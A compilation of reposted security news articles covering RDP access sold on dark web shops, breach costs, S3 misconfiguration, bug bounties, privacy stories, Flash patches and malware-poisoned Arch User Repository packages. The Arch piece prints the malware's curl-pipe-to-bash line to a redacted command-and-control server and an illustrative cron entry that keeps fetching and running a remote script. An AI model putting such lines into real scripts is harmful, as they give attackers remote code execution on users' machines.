Major International Airport System Access Sold for $10 on Dark Web

Researchers from the McAfee Advanced Threat Research team made the discovery with nothing more than an open search on UAS, a Russian RDP shop.

Dark Web marketplaces are troves of illicit products and data: stolen credentials, credit card numbers, and, as researchers recently discovered, remote desktop protocol (RDP) access to the security and building automation systems of a major international airport – for the cheap price of $10.

Researchers from the McAfee Advanced Threat Research team used an open search on Ultimate Anonymity Service (UAS), a Russian RDP shop, to hunt for open RDP ports. They narrowed the search from 65,536 possible IP addresses down to three; with a complete IP address in hand, they could look up the WHOIS data, which showed all three addresses belonged to a major international airport, the name of which is being withheld.

RDP is a proprietary protocol developed by Microsoft to let someone access another machine via a graphical interface. It’s intended for use by system admins but can be dangerous when attackers use it as an entry point. The SamSam ransomware campaign against American businesses is one recent example, in which attackers spent $10 for access to a machine and demanded $40,000 in ransom. The actors behind SamSam continue to advance and spread the attack.

RDP shops serve as the foundation for major cyberattacks, reports McAfee, whose researchers scanned several RDP shops selling anywhere from 15 to more than 40,000 connections; the latter figure belonged to UAS, the largest shop in their research.

RDP access provides a route to target systems without phishing, malware, or an exploit kit. Top uses for RDP access include spam campaigns, cryptomining, ransomware, planting false flags to disguise illegal activity as coming from a victim’s machine, and pilfering system data for identity theft, credit card fraud, account takeover, extortion, and other malicious purposes.

“It’s a useful protocol,” says McAfee chief scientist Raj Samani, pointing to the benefits of RDP. “But unless it’s locked down, there are concerns whereby anybody with an IP address and login can get access to this particular environment.”

RDP shops sell entry to systems that are accessible via port 3389 – the RDP port – due to an issue like misconfiguration or missing two-factor authentication, Samani explains. Systems are advertised with their IP address, country, state, ZIP code, bandwidth, and date of addition. Price varies anywhere between $3 and $20 depending on bandwidth; the type of business is not a factor. Attackers simply have so much access they don’t have time to figure out where it all leads.
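
One way for defenders to see what such shops see is simply to test whether port 3389 answers from outside the network. A minimal sketch using netcat (the address below is a documentation placeholder, not a real target):

   # Probe TCP port 3389 from outside the perimeter.
   # -z: check the port without sending data; -w 3: three-second timeout.
   nc -z -w 3 203.0.113.10 3389 && echo "RDP port 3389 is reachable"

If the probe succeeds from an arbitrary internet address, the system is a candidate for exactly the kind of listing described above.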

“They’re not going through and looking at the impacted organization,” Samani continues. “They’ve got so much of this [data] that it’s economies of scale.”

Further open-source searches revealed user accounts, including an administrator account and two accounts associated with companies specializing in airport security – one in building automation, the other in video surveillance and analytics. Researchers also found a domain likely associated with the airport’s automated transit system.

“It’s troublesome that a system with such significant public impact might be openly accessible from the Internet,” writes John Fokker, head of cyber investigations for McAfee Advanced Threat Research, in a blog post on their findings.

Researchers also found RDP access being sold to multiple government systems, including those linked to the United States, and dozens of connections to healthcare institutions, such as nursing homes and medical equipment suppliers.

“This is not finding a piece of hay in a haystack,” Samani says. “This is a business, a huge business that is selling access to organizations and systems all across the world.”

To protect their organizations from this level of vulnerability, security managers are advised to take a few precautions: Use complex passwords and two-factor authentication to make brute-force RDP attacks harder to complete; don’t allow RDP connections over the open Internet; block IPs after too many failed login attempts; and regularly check for unusual entry attempts.
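
As a hedged illustration of the “block IPs after too many failed login attempts” advice – assuming a Linux gateway in front of the RDP host, an assumption rather than a detail from the report – the iptables “recent” module can throttle repeated connection attempts to port 3389:

   # Record each new connection to 3389, then drop any source that
   # opens more than 3 new connections within 60 seconds.
   iptables -A INPUT -p tcp --dport 3389 -m conntrack --ctstate NEW \
            -m recent --set --name RDP
   iptables -A INPUT -p tcp --dport 3389 -m conntrack --ctstate NEW \
            -m recent --update --seconds 60 --hitcount 4 --name RDP -j DROP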


Article source: https://www.darkreading.com/threat-intelligence/major-international-airport-system-access-sold-for-$10-on-dark-web/d/d-id/1332270?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

New Cyber Center Opens at Augusta University in Georgia

University partners with state on $100 million Georgia Cyber Center for cybersecurity education and research.

The state of Georgia and Augusta University have opened the Georgia Cyber Center, a new $100 million cybersecurity education and research operation. A partnership between the state and the university, the center is located on the university’s campus and is intended to improve both Georgia’s and the nation’s cybersecurity through research, workforce development, and entrepreneurship.

Its physical plant spans 332,000 square feet across two adjacent buildings. The first – the Hull McKnight Building – opened July 10, along with its 340-seat auditorium. In addition to the auditorium, the center features restricted-access space to meet classified and high-security needs, secure briefing space, a cyber range, an incubator/accelerator program, spaces for collaboration, and classrooms equipped for virtual and on-site training. The second building is scheduled to open in December 2018.

The Georgia Cyber Center comes as the Augusta area prepares for the relocation of the US Army Cyber Command, set to complete its move from the Washington DC area to Fort Gordon in the coming years. Students from academia, private industry, government, and the military will take classes taught by faculty from Augusta University, the US Army Cyber School, the Cyber Protection Brigade, and NSA Georgia. In addition, all upper-division courses for the school’s computer science, information technology, and cyber programs will be taught at the new facility.


Article source: https://www.darkreading.com/operations/new-cyber-center-opens-at-augusta-university-in-georgia/d/d-id/1332272?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

This Is How Much a ‘Mega Breach’ Really Costs

The average cost of a data breach is $3.86 million, but breaches affecting more than 1 million records are far more expensive.

Worldwide, companies hit with a data breach pay an average of $3.86 million, marking a 6.4% increase from last year. It’s no small amount for any company, but a few million is only a small fraction of the cost of “mega breaches,” which compromise at least 1 million records.

The “2018 Cost of a Data Breach Study,” sponsored by IBM Security and conducted by the Ponemon Institute, annually evaluates the total cost of security incidents. This marks the first time researchers calculated costs associated with breaches ranging from 1 million to 50 million lost records.

So what’s the damage? It turns out massive security breaches come with equally large price tags, ranging from $40 million for 1 million records lost to $350 million for 50 million records lost. Note that the per-record cost falls with scale: roughly $40 per record at the low end versus about $7 per record at the high end.

Researchers had been wanting to dig into the financial impact of mega breaches but previously lacked the data to do so, explains Caleb Barlow, vice president at IBM Security.

“You have to remember if we go back three or four years ago, when you got into these scenarios, unless they were credit-card-related, companies didn’t need to disclose,” he says. Now, as a result of breach disclosure laws, analysts have more data to work with.

As for the overall price increase of 6.4%, Barlow says the most concerning aspect isn’t the percentage itself, but the fact it continues to grow at all. The potential impact on consumers, and the companies supporting them, has become significant enough to gain board-level attention.

“With the average cost just under $4 million – and [we’re] not talking about mega breaches when we say $4 million – the fact this continues to grow is indicative that we as an industry haven’t got our arms around this yet,” he says.

According to the study, the largest share of data breaches (48%) comes from malicious or criminal attacks, which are also the most expensive, at $157 per capita. Twenty-seven percent are caused by human error – for example, negligent employees or contractors ($131 per capita). One-quarter result from system glitches, including both technical and business process failures ($128 per capita).

Hundreds of factors influence the cost of a data breach. Third-party involvement is the most significant: if a third party causes an incident, it adds about $13 per record stolen, the report reveals. “Every company nowadays is not a product only of what they do, but their supply chain as well,” Barlow points out. Extensive cloud migration and compliance failure both contribute to the growing cost, adding about $12 per record to the total expense.

One of the factors researchers can better calculate is the reputational side of breach cost, including customer churn and brand damage. If a customer decides not to conduct business with a company due to a breach, or to wait to process a transaction, it can have a pretty devastating impact, he continues. Attackers are taking notice.

“Not only is that potential impact understood now in the cost of a data breach, but it’s something the adversary is very much aware of as well,” Barlow says. Companies with less than 1% loss of existing customers have an average breach cost of $2.7 million. Researchers estimate those with a churn rate over 4% face an average cost of $4.9 million.

Cost of data breach disclosure is another pricey factor, and it’s highest in the United States. Not only is the attack surface larger there compared with other nations, but there are also 49 unique breach disclosure laws to deal with. Companies will likely have to handle the process differently in each jurisdiction where they do business, increasing the cost of alerting users.

Fortunately, a few practices can lessen the financial burden of a data breach.

“There are definitely some things that can reduce the cost,” says Barlow, and not just breach prevention. This marks the second year in a row that incident response – having a team and plan in place for remediation – is the top cost-cutting measure ($14 per record).

Extensive use of encryption is another cost saver, cutting about $13 per record, followed by business continuity management (BCM) involvement and employee training ($9.30 each), participation in threat sharing ($8.70), artificial intelligence platforms ($8.20), and use of security analytics ($6.90).


Article source: https://www.darkreading.com/threat-intelligence/this-is-how-much-a-mega-breach-really-costs/d/d-id/1332274?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Getting Safe, Smart & Secure on S3

AWS Simple Storage Service has proven to be a security minefield. It doesn’t have to be if you pay attention to people, process, and technology.

Accenture. The United States Department of Defense. Walmart. Experian. FedEx. Verizon. Dow Jones. What do these organizations have in common? All of them have suffered a data breach as a result of a misconfigured open S3 container. Even cloud-native companies like Uber have suffered major data breaches from this common misconfiguration. This failure of process and technology has cost companies tens of millions of dollars and resulted in untold reputational harm, and they have only themselves to blame.

The default configuration for S3 — shorthand for Amazon Web Services’ Simple Storage Service — is closed to the public Internet. In that configuration, it’s reasonably secure. But there is a problem with relying on this configuration: it assumes that only people within an organization are using it. That is a bad assumption because it’s actually very easy to misconfigure S3 in such a way that it’s left world-readable (or even writable!).

For example, one “benefit” of the public cloud is that people can easily provision and configure resources for themselves. Random IT Guy in a large corporation needs some storage to deliver content? Spin up an S3 container and everything is good to go! The problem is that when Random IT Guy provisions storage, he doesn’t necessarily know how to secure it. Worse, there’s nothing to prevent him from doing it insecurely, or to alert anyone else to the fact that it’s insecure, or even that it exists in the first place.
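
If Random IT Guy wants to know whether his bucket ended up world-readable, the check is one AWS CLI call away. A minimal sketch (the bucket name is hypothetical; a grant to the global AllUsers group is what makes a bucket public):

   # List any ACL grants to the global "AllUsers" group on a bucket.
   # A non-empty result means anyone on the internet can read it.
   aws s3api get-bucket-acl --bucket example-content-bucket \
     --query "Grants[?Grantee.URI=='http://acs.amazonaws.com/groups/global/AllUsers']"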

Shared Responsibility or Blanket Immunity?
Public cloud relies on the “shared responsibility” model, which delineates what vendors and users are responsible for regarding security. The notion of “shared responsibility” is extremely cute. According to this model, cloud vendors — including AWS — are responsible for the security of the cloud itself. Users are responsible for the security of what’s in it. This means that any public cloud provider, when faced with a breach of a customer’s data, is going to claim the customer was ultimately responsible for the security of the applications and data. Claiming responsibility for only the security of the cloud itself is close to declaring blanket immunity.

Still, there are some real, practical things you can do that will make an actual difference in your security posture as it relates to S3 and the public cloud. They fall on three fronts: people, process, and technology.

People: The Magical Unicorn
Everyone knows we have a talent problem. There’s a shortage of cloud talent, a shortage of security talent, and cloud security talent is basically a magical unicorn. If anything has become clear, it’s that companies — even cloud-native ones — can’t hire the talent they need to make the cloud secure and perform better. The bottom line: stop trying to hire magical unicorns and start creating them. Just like the exceedingly rare “full stack developer” who knows both back end and front end, cloud security professionals are hard to find in the wild but possible to train. Create centers of excellence for cloud security and spend the hours and training dollars to make them leaders. Having expertise in-house will pay dividends in the long run.

Process: Effectively Deploying the Magical Unicorn
When the world’s largest shipping company, Maersk, was hit by a ransomware attack in June 2017, it pulled off an unprecedented feat of IT efficiency: Over the course of 10 days, Maersk’s IT team reinstalled over 4,000 servers, 45,000 PCs, and 2,500 applications. This Herculean recovery effort demonstrated that Maersk is clearly an incredibly effective technology organization … but not effective enough to not get breached.

The truth is that magical unicorns aren’t going to secure your enterprise if you don’t have the processes in place to understand your attack surface at scale. The Maersk breach occurred in its on-premises environment. In the cloud, understanding your attack surface is even harder because it’s so easy and cheap to spin up instances. So, when it comes to the cloud, including cloud storage like S3, organizations need to implement processes that control who can spin up instances, create the documentation required to do so, and then put in place audit procedures to make sure those rules are followed. Those audit procedures come back to people: This stuff needs to be someone’s job.
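
That job is much easier with a little automation behind it. As a sketch of one such audit procedure – assuming the AWS CLI is configured with credentials that can read every bucket’s ACL – a short loop can flag world-readable buckets across an account:

   # Enumerate all buckets and flag any with a public-read ACL grant.
   for bucket in $(aws s3api list-buckets --query 'Buckets[].Name' --output text); do
     aws s3api get-bucket-acl --bucket "$bucket" \
       --query "Grants[?Grantee.URI=='http://acs.amazonaws.com/groups/global/AllUsers']" \
       --output text | grep -q . && echo "PUBLIC: $bucket"
   done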

Technology: Putting the Horn on the Horse  
Sometimes the only difference between a horse and a magical unicorn is the technology backing them up. In cloud security, the right technology can put the horn on the horse, so to speak, accelerating the transformation from IT pro to cloud security expert. Cloud vendor security tools often fall short of achieving this outcome. Providers like AWS and Azure give you security monitoring tools, but those mostly produce a sea of data points for human experts to make sense of.

While cloud providers offer the bare minimum, many third-party vendors are working to address this challenge. Common feature sets among these vendors include the ability to continuously monitor and update as cloud instances get spun up and down (so you know what your attack surface actually is), as well as tracking the traffic patterns of S3 data to surface potentially problematic activity. Depending on the data set being used — whether it’s logs, agents, or network traffic — cloud security professionals can get different perspectives and insights, while the addition of machine learning to many of these offerings is improving the accuracy of alerts.

In summary, S3 has proven to be a security minefield, but it doesn’t have to be. Cloud security is an emerging field, presenting an opportunity for smart organizations to lead the way.


Article source: https://www.darkreading.com/attacks-breaches/getting-safe-smart-and-secure-on-s3/a/d-id/1332257?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Banks Suffer an Average of 3.8 Data Leak Incidents Per Week

New study examines how financial services information gets sold and shared in the Dark Web.

It’s no secret that financial services organizations are juicy targets for cybercrime, but new data shows how much more the bad guys are stealing from them: in the past year, there’s been a 135% jump in bank data for sale on the Dark Web. 

A new report from IntSights Cyber Intelligence shows financial services is the most-attacked industry: in 2017, the security firm found an average of 207 indicators of attack – such as company IPs, domains, email addresses, and data included in Dark Web chatter, malware, or target lists – per US bank. In the first half of 2018, that average hit 520.

“Based on our data of leaked banking information, we saw a 135% year-over-year increase in financial data being sold on dark web black markets. For the first six months of 2018, we’ve seen an average of 98.9 incidents of data leakage per bank. That translates to 3.8 incidents per week per bank,” IntSights wrote in its report.


Article source: https://www.darkreading.com/endpoint/privacy/banks-suffer-an-average-of-38-data-leak-incidents-per-week/d/d-id/1332275?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Critical Vulns Earn $2K Amid Rise of Bug Bounty Programs

As of June, a total of $31 million has been awarded to security researchers for this year – already a big jump from the $11.7 million awarded for the entire 2017.

Bug bounty programs are paying more money to more hackers, more of whom are discovering severe vulnerabilities: As of June, a total of $31 million has been awarded to security researchers for this year – already a big jump from the $11.7 million awarded for the entire 2017.

Over the past year, 116 bug reports were valued at over $10,000, with organizations offering up to $250,000 for severe flaws discovered. The numbers come from HackerOne’s “Hacker-Powered Security Report 2018,” in which analysts pulled data from 78,275 vulnerability reports submitted by ethical hackers to more than 1,000 organizations via HackerOne’s bug bounty platform.

“All of the volume numbers have increased tremendously,” says HackerOne CEO Marten Mickos. “But they have been trending like this for the past three years. The direction is clear.”

About 60% of organizations on HackerOne pay an average of $1,500 for critical vulnerabilities. In general, the average bounty for critical flaws is $2,041, a 6% increase year-over-year. Among the highest-awarding programs, the average award for a critical bug increased 33% to $20,000.

More than 72,000 vulnerabilities have been fixed as of May, and more than one-third (27,000) were addressed in the past year. Of the top 15 vulnerability types reported, cross-site scripting is the most common across all industries with the exception of healthcare and technology, where information disclosure flaws are most popular.

Government Programs Pick Up Speed
Private organizations are lagging behind the adoption curve when it comes to crowdsourced security, HackerOne reports. Nearly all (93%) of the companies on the Forbes Global 2000 list lack a policy for receiving, responding to, and remediating critical bug reports submitted by external parties.

Private programs make up 79% of all bug bounty programs on HackerOne, down from 88% in 2017 and 92% in 2016 – a sign more programs are going public. Most public bug bounty programs are in tech (63%), financial services and banking (9%), and media and entertainment (9%). Public programs made up 19% of program launches last year, about double the year prior.

In the government sector, specifically, there was a 125% increase in program launches around the world. The European Commission and Singapore’s Ministry of Defence have both launched bug bounty initiatives, and the US Department of Defense wrapped up bug bounty challenges for the US Army, US Air Force, and the Defense Travel System.

“Looking at industries, it’s interesting to see the government sector grow so strongly and pay so well,” Mickos says. “They pay more than the tech sector or telecom sector for critical vulnerabilities. It tells us something – it tells us the government is very serious about this. If you pay more for critical reports, you get more critical reports.”

Indeed, government programs pay an average of $3,892 for critical vulnerabilities, analysts found. The tech sector pays slightly less, at $3,635 per bug, followed by telecom ($2,976), professional services ($2,719), transportation ($1,892), and retail and ecommerce ($1,720).

A few factors are holding back private companies, Mickos says. The biggest reason, he says, is a mental block: Many companies simply don’t see the value. Some do, but they don’t have the capacity to fix flaws once they learn about them.

“If you lack the ability to fix them, you’re caught between a rock and a hard place,” Mickos says. “The ability to fix, and roll out fixes, is essential.”

Hacking Hackers’ Education
Security researchers have to think outside the box to gain the skills they need. Despite the growth of hacker education, less than 5% of hackers learn their skills in a classroom, HackerOne reports. Most (nearly 58%) are self-taught. Half studied computer science at an undergraduate or graduate level, and 26.4% studied computer science during or before high school.

One-quarter of hackers who submit to HackerOne are full-time students, over 90% are under the age of 35, and 44% are IT pros. Financial gain is a primary reason why ethical hackers hack, but it’s decreasing in importance. Most are motivated by the chance to learn techniques (15%), to be challenged (14%), and to have fun (14%), with money falling to fourth place (13%).


Article source: https://www.darkreading.com/threat-intelligence/critical-vulns-earn-$2k-amid-rise-of-bug-bounty-programs/d/d-id/1332277?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Facebook stares down barrel of $660,000 fine over data slurping

It’s the hot story right now in Europe…

…no, we’re not talking about the news that France just dumped neighbours Belgium out of the World Series with a 1-0 victory. [Surely you mean the World Cup? – Ed.]

We’re talking about the widespread media coverage of the news that the UK Information Commissioner’s Office (ICO) intends to fine Facebook £500,000 (about $660,000) over the Cambridge Analytica fiasco:

[The ICO intends] to fine Facebook a maximum £500,000 for two breaches of the Data Protection Act 1998.

Facebook, with Cambridge Analytica, has been the focus of the investigation since February when evidence emerged that an app had been used to harvest the data of 50 million Facebook users across the world. This is now estimated at 87 million.

The ICO’s investigation concluded that Facebook contravened the law by failing to safeguard people’s information. It also found that the company failed to be transparent about how people’s data was harvested by others.

Cambridge Analytica (CA) – in case you missed the saga as it uncoiled itself earlier this year – was a web analytics company started by a group of researchers with connections to Cambridge University in the UK.

Put web analytics together with the word Cambridge and you get the cool-sounding name Cambridge Analytica.

What seems to have started as some sort of academic research project soon morphed into a commercial enterprise that allowed participants to take psychometric tests via a Facebook app.

(Facebook apps are essentially plugins for the Facebook platform rather than applications in the traditional sense.)

The sneaky? bait-and-switchy? sleight-of-hand? devious? obvious-with-hindsight? why was anyone surprised? [delete as inappropriate] trick employed in the CA app was that the app explicitly asked you to give it access to account data that wasn’t available by default.

Notably, Cambridge Analytica acquired access to your profile, including a list of all your friends.

That means not only that the app learned a lot about you, but also that it could associate your own “psychometric profile” with your friends – even if they disapproved of psychometric tests; even if they’d never have agreed themselves; indeed, even if they’d never heard of Cambridge Analytica.

As we explained back in March 2018:

You might well question how 270,000 people signing up for a Facebook personality quiz blossomed into a potential data breach affecting 50 million users [now 87 million users] – nearly 25% of potential US voters.

[…] The app scraped not just test-takers’ private profile data, but also that of their friends. Facebook didn’t disallow such behavior from apps at the time, but such data harvesting was allowed only to improve user experience in the app, not to be sold or used for advertising.

Facebook ultimately kicked CA off its platform, but not before a global brouhaha had erupted over whether the social networking giant ought to have done more to make sure that app developers stuck to both the letter and the spirit of Facebook’s own rules.

The ICO certainly seems to think Facebook could have, and should have, done more to stop Cambridge Analytica getting away with its industrial-scale data harvesting – thus the fine.

What next?

Would the ICO have hit Facebook harder if it could?

The ICO’s own announcement makes a point of mentioning that, even though current GDPR rules could in theory have led to a very much bigger fine, “due to the timing of certain incidents in this investigation, civil monetary penalties have to be issued under the previous legislation, the Data Protection Act 1998.”

The maximum financial penalty in civil cases under pre-GDPR laws is £500,000 – and that’s the amount the ICO chose.

Will Facebook pay up?

The ICO’s “fine” is currently only a Notice of Intent, so Facebook still has the right of reply.

Will we all be more careful with apps and plugins in future?

Let’s hope so – remember our simple rule: IF IN DOUBT, DON’T GIVE IT OUT.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/CKwWlBK3E14/

Apple and Google questioned by Congress over user tracking

In May, two weeks before the “we’re not kidding about this protecting user data stuff” General Data Protection Regulation (GDPR) went into effect in the EU, Apple started getting its protecting-user-data ducks in a much straighter row.

It cracked down on developers whose apps share location data, kicking them off the App Store until they cut out any code, frameworks or Software Development Kits (SDKs) that were in violation of its location data policies.

But hang on a minute… members of the US House of Representatives Energy and Commerce Committee asked Apple on Monday: why was it even necessary to limit how much data third-party app developers can collect from Apple device users in the first place?

… given that CEO Tim Cook has repeatedly told the press that Apple believes that “detailed profiles of people that have incredibly deep personal information that is patched together from several sources [shouldn’t] exist”?

Similar question to Alphabet CEO Larry Page: in June 2017, Google announced that Gmail would stop reading our email.

Nonetheless, reports that surfaced last week found the company is still allowing third parties to merrily scan away, giving them access to our email text, signatures, and receipt data, in order to target-market advertising. In fact, a new class action suit was filed against the company on Thursday night over developers’ scanning of millions of users’ private messages.

The committee wants Apple and Alphabet to answer some questions about how they’ve represented all this third-party access to consumer data, about their collection and use of audio recording data, and about location data that comes from iPhone and Android devices.

Inquiring minds want to know, for one thing, whether our mobile phones are actually listening to our conversations, the committee said in a press release.

Recent reports have… suggested that smartphone devices can, and in some instances, do, collect ‘non-triggered’ audio data from users’ conversations near a smartphone in order to hear a ‘trigger’ phrase, such as ‘okay Google’ or ‘hey Siri.’ It has also been suggested that third party applications have access to and use this ‘non-triggered’ data without disclosure to users.

We reported on that study – titled Panoptispy – last week. It comes from researchers at Northeastern University in Boston, who found that yes, your smartphone can watch and listen to you if it wants to.

They found that a small number of the 17,000 apps they analyzed were recording video, images or sound covertly and sending it all back to the app’s maker or a third party. On the plus side: it seems to be done not out of ill intent, but rather from misunderstandings about privacy. On the not so positive side, it lays bare the chaotic ecosystem in which apps and API developers exist, how poorly regulated it is, and how much developers can get away with if they choose to.

Here’s the full letter the lawmakers sent to Apple. Here’s the one they sent to Google’s overlord, Alphabet.

In the letters, the committee members remind Google and Apple that consumers have certain expectations about device tracking – particularly when a phone lacks a SIM card and when location services, WiFi and Bluetooth are turned off, such as when a device is in Airplane mode.

According to Gizmodo, Apple hadn’t responded to press inquiries as of Monday. Google sent this statement:

Protecting our users’ privacy and securing their information is of the utmost importance. We look forward to answering the Committee’s questions.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/lI-8KuFeqmk/

Update Flash (and Adobe Acrobat) now!

Dear Adobe Flash, you will not wear me down.

I will never, ever, ever tire of writing these words:

Remove your Flash player and, if for some reason you can’t or won’t (because… I don’t know… maybe your laptop is encased in concrete or your grip on life is maintained by an iron lung that only runs in the Flash player) then you should update your Flash player to the latest version.

I won’t tire of writing these words because, despite the grinding relentlessness with which they’re necessary, they remain important.

Critical Flash updates may be as regular as clockwork and as boring as dirt, but so long as Flash lives and criminals are exploiting it we have to stay on top of them. Even if you’ve taken the sensible step of removing it from your own machines, you may have friends and family who have not.

Taking an active interest in Flash updates doesn’t just protect you from malicious websites that exploit Flash bugs. Familiarity with the update process, how updates arrive, and the version you’re supposed to be running also makes it easier to spot the fake Flash updates that are so popular with malware peddlers.

This month’s critical update fixes a type confusion vulnerability that can lead to arbitrary code execution, and it’s rated by Adobe as priority 2, meaning that “There are currently no known exploits”.

That’s good news – it means that, unlike in February and June this year, when vulnerabilities were fixed after criminals had already begun to exploit them, you get to fix the roof while the sun is still shining.

You still have to fix it though.

The bug exists in all versions of Flash up to 30.0.0.113 and you need version 30.0.0.134 for the fix.

The Flash players bundled with Google Chrome, Microsoft Edge, and Internet Explorer 11 for Windows 10 and 8.1 will get it automatically.

Adobe advises that everyone else should update “via the update mechanism within the product” or by getting a freshly minted copy of its player from the Adobe Flash Player Download Center.

I advise that if you can live without it, do.

After a quiet few months, July’s Patch Tuesday update from Adobe also saw Adobe Acrobat delivering an eye-catching “hold my beer” to its beleaguered stablemate with no fewer than 53 critical bugs fixed, and a bunch of others besides.

Adobe advises that its Acrobat and Acrobat Reader products should update themselves but you can find instructions on how to update them manually, or in managed environments, by following the instructions in the security bulletin.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/VYDeA6gfoIk/

Another Linux distro poisoned with malware

Another day, another Linux distro with malware troubles.

Last time it was Gentoo, a hard-core, source-based Linux distribution that is popular with techies who like to spend hours tweaking their entire operating system and rebuilding all their software from scratch to wring a few percentage points of performance out of it.

That sort of thing isn’t for everyone, but it’s harmless fun and it does give you loads of insight into how everything fits together.

That sets it apart from distros such as ElementaryOS and Mint, which rival and even exceed Windows and macOS for ease of installation and use, but don’t leave you with much of a sense of how it all actually works.

This time, the malware poisoning happened to Arch Linux, another distro we’d characterise as hard-core, though very much more widely used than Gentoo.

Three downloadable software packages in the AUR, short for Arch User Repository, were found to have been rebuilt so they contained what you might (perhaps slightly unkindly) refer to as zombie downloader robot overlord malware.

Bots or zombies are malware programs that call home to fetch instructions from the crooks on what to do next.

The hacked packages were: acroread 9.5.5-8, balz 1.20-3 and minergate 8.1-2; they’ve all apparently been restored to their pre-infection state.

What happened?

Simply put, the packages had one line added – on Linux, the core functionality of a bot can be trivially condensed into a single line:

   curl -s https://[redacted]/~x|bash -&

This single line of code, part of an installation script written in the Bash language, fetches a text file from a command-and-control (C&C) server and runs it as a script in its own right.

The command curl is a program that fetches a web page using HTTP or HTTPS. The pipe character (|) is Unix shorthand for “use the output of the command on the left directly as the input of the command on the right”. And bash - says to read the data arriving on its input, denoted by the dash (-), and run it directly as a script program. The pipe character therefore means you don’t need to run one command to fetch a file and then tell the next command to read the same file back in – the data is, literally and figuratively, piped between the two programs via memory. Finally, the ampersand (&) means to run the whole thing in the background so that it’s as good as invisible.

This means that the attacker can change the behaviour of the malware at any time by altering the commands stored in the file ~x on the C&C server.

At present, the ~x command sets up a regular background task – the Linux equivalent of a Windows service – that repeatedly runs a second script called u.sh that’s downloaded from the web page ~u on the same C&C server.
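
The article doesn’t reproduce the scheduling trick itself, but purely as an illustration of the pattern – a recurring job that re-fetches its instructions – the same effect could be achieved with a single cron entry (hypothetical; the [redacted] placeholder is carried over from above):

   # Illustrative only: install a crontab (replacing any existing one)
   # that re-downloads and runs ~u every five minutes.
   echo '*/5 * * * * curl -s https://[redacted]/~u | bash' | crontab -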

The u.sh file tries to extract some basic data about the infected system, and to upload it to a Pastebin account.

The system data that the u.sh malware is interested in comes from the following Arch commands:

 echo ${MACHINE_ID}    -- this computer's unique ID (randomly generated at install time)
 date '+%s'            -- the current date and time
 uname -a              -- details about the Linux version that's loaded
 id                    -- details about the user account running the script
 lscpu                 -- technical details about the system processor chip
 pacman -Qeq           -- the software you've installed (Qe means "query explicit")
 pacman -Qdq           -- any extra software needed to go with it (Qd means "query dependencies")
 systemctl list-units  -- all the system services

Fortunately, the part of the script that does the data exfiltration contains a programming error, so the upload never happens.

The Arch reaction

Arch is well-respected for the enormous quantity of community documentation it has published in recent years – users of many other distros often find themselves referring to Arch Linux documentation pages to learn what they need to know.

Where Arch has been – how can we say this? – a little less likable is the extent to which the distro’s culture mirrors the aggressive “alpha techiness” of the King of Linux, Linus Torvalds himself – a man who is on record for numerous intolerant, insulting and frequently purposeless outbursts aimed at those he thinks are in the way.

So we weren’t entirely surprised to see this online response from one of the luminati of the Arch community, dismissing the malware with a petulant “meh”:

This would be a warning for what exactly? That orphaned packages can be adopted by anyone? That we have a big bold disclaimer on the front page of the AUR clearly stating that you should use any content at your own risk?

This thread is attracting way more attention than warranted. I’m surprised that this type of silly package takeover and malware introduction doesn’t happen more often.

To be fair to the Arch team, the hacked packages were found in the AUR – the Arch User Repository – which isn’t vouched for or vetted by the Arch maintainers, in the same sort of way that none of the off-market Android forums are vouched for by Google.

Nevertheless, the AUR site is logoed up and branded as the Arch User Repository, not merely the User Repository, so a bit less attitude from the Arch team wouldn’t hurt.

What to do?

You might not like Arch’s attitude – and if you don’t, you’re probably using a different distro anyway – but the warning on the community-operated Arch User Repository does, in fact, say it all, even if we’d sneak a hyphen between “user” and “produced”:

DISCLAIMER: AUR packages are user produced content. Any use of the provided files is at your own risk.

If you don’t trust it, don’t install it.


Note. We don’t expect this thing to be a problem in real life, but Sophos products will nevertheless detect the abovementioned scripts as Linux/BckDr-RVR, and block the C&C URLs used to “feed” the attack. (If you’d like to try Sophos Anti-Virus for Linux, by the way, it’s 100% free both at work and at home.)


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/aaF7oCf1Ax8/